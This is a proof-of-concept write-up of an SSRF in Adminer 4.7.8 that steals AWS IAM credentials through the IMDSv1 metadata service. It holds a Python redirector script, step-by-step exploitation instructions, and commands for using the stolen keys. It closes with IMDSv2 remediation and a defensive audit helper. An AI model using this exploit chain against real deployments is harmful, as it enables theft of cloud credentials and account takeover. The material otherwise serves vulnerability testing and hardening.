AWS metadata service v1 SSRF POC

POC process

  • On the attacker-controlled machine, start a listener that redirects every request to the credentials URL
#!/usr/bin/env python3
# Minimal HTTP redirector: every GET is answered with a 301 pointing at the
# URL given on the command line.
# Usage: ./redirect.py 1337 http://169.254.169.254/latest/meta-data/iam/security-credentials/

import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

if len(sys.argv) - 1 != 2:
    print("Usage: {} <port_number> <url>".format(sys.argv[0]))
    sys.exit(1)

class Redirect(BaseHTTPRequestHandler):
    def do_GET(self):
        # Send the caller on to the target URL (second command-line argument)
        self.send_response(301)
        self.send_header('Location', sys.argv[2])
        self.end_headers()

HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()

Deploy the vulnerable application, for example Adminer v4.7.8:

apiVersion: apps/v1
kind: Deployment
metadata:
  # Unique key of the Deployment instance
  name: adminer-v4.7.8
  namespace: default
spec:
  # 1 Pod should exist at all times.
  replicas: 1
  selector:
    matchLabels:
      app: adminer-v4.7.8
  template:
    metadata:
      labels:
        # Apply this label to pods and default
        # the Deployment label selector to this value
        app: adminer-v4.7.8
      # annotations:
      #   instrumentation.opentelemetry.io/inject-java: 'true'
      #   instrumentation.opentelemetry.io/container-names: "php-app-demo"

    spec:
      containers:
      - name: adminer
        # Run this image
        image: adminer:4.7.8
        # command: ["php", "-S", "[::]:8080", "-t", "/var/www/html"]
        imagePullPolicy: IfNotPresent
        ports:
        - name: http
          containerPort: 8080
          protocol: TCP
        env:
          - name: TEST_AUTOINSTRUMENTATION
            value: test_value

Execution testing

  • Forward the port to the local machine: kubectl port-forward deploy/adminer-v4.7.8 -n default 8080:8080
  • Log in using the "Elasticsearch (beta)" system
  • Fill in the address and port of the remote Python program as the server: x.x.x.x:1337
  • If the AWS instance uses IMDSv1, this should print the role name
  • Change the redirect URL of the Python program so that the role name is appended as the suffix
  • Click the login button again; this should print the credentials

Use the AWS CLI with the obtained credentials:

export AWS_ACCESS_KEY_ID=ASIAEXAMPLEEXAMPLEEE
export AWS_SECRET_ACCESS_KEY=EXAMPLEEXAMPLEEXAMPLEEXAMPLEEXAMPLESEXAM
export AWS_SESSION_TOKEN=EXAMPLEEXAMPLEEXAMPLE...<snip>

Upgrade the IMDS to v2. IMDSv2 requires a session token obtained with a PUT request before any metadata is returned, so a redirect-driven GET like the one above no longer yields the credentials:

TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
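As an added check from the defender side (not part of the original PoC), the following Python helper audits EC2 instances for metadata options that still permit IMDSv1. It assumes the DescribeInstances response shape (Reservations -> Instances -> MetadataOptions) and uses constructed sample data instead of a live API call; the remediation string is the AWS CLI command that enforces IMDSv2.

```python
#!/usr/bin/env python3
# Added audit helper (not part of the original PoC): walk a DescribeInstances
# response and flag instances whose MetadataOptions still allow IMDSv1.
# The response shape (Reservations -> Instances -> MetadataOptions) is the
# real EC2 API shape; the sample data below is constructed for the demo.

def audit_metadata_options(response):
    """Return [(instance_id, finding), ...] for instances needing attention."""
    findings = []
    for reservation in response.get("Reservations", []):
        for inst in reservation.get("Instances", []):
            iid = inst["InstanceId"]
            opts = inst.get("MetadataOptions", {})
            if opts.get("HttpEndpoint") == "disabled":
                continue  # IMDS unreachable from the instance: nothing to flag
            # HttpTokens "optional" means a plain GET without a token is still
            # answered, which is what the redirect-based SSRF above relies on.
            if opts.get("HttpTokens", "optional") != "required":
                findings.append((iid, "IMDSv1 allowed (HttpTokens is optional)"))
            # A hop limit above 1 lets the IMDSv2 token response cross a NAT or
            # bridge (e.g. a pod network); review whether workloads need it.
            if opts.get("HttpPutResponseHopLimit", 1) > 1:
                findings.append((iid, "HttpPutResponseHopLimit > 1, review"))
    return findings

def remediation_command(instance_id):
    """AWS CLI command that enforces IMDSv2 on a running instance."""
    return ("aws ec2 modify-instance-metadata-options --instance-id {} "
            "--http-tokens required --http-endpoint enabled").format(instance_id)

# Constructed sample: one instance still on IMDSv1, one enforced but with a
# raised hop limit, one with IMDS switched off entirely.
SAMPLE_RESPONSE = {"Reservations": [{"Instances": [
    {"InstanceId": "i-0aaa0000example1",
     "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "optional",
                         "HttpPutResponseHopLimit": 1}},
    {"InstanceId": "i-0bbb0000example2",
     "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "required",
                         "HttpPutResponseHopLimit": 2}},
    {"InstanceId": "i-0ccc0000example3",
     "MetadataOptions": {"HttpEndpoint": "disabled", "HttpTokens": "optional",
                         "HttpPutResponseHopLimit": 1}},
]}]}

if __name__ == "__main__":
    for iid, finding in audit_metadata_options(SAMPLE_RESPONSE):
        print(iid, finding)
        if "IMDSv1" in finding:
            print("  fix:", remediation_command(iid))
```

Feed it the output of `aws ec2 describe-instances` (parsed as JSON) to run it against a real account.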

Reference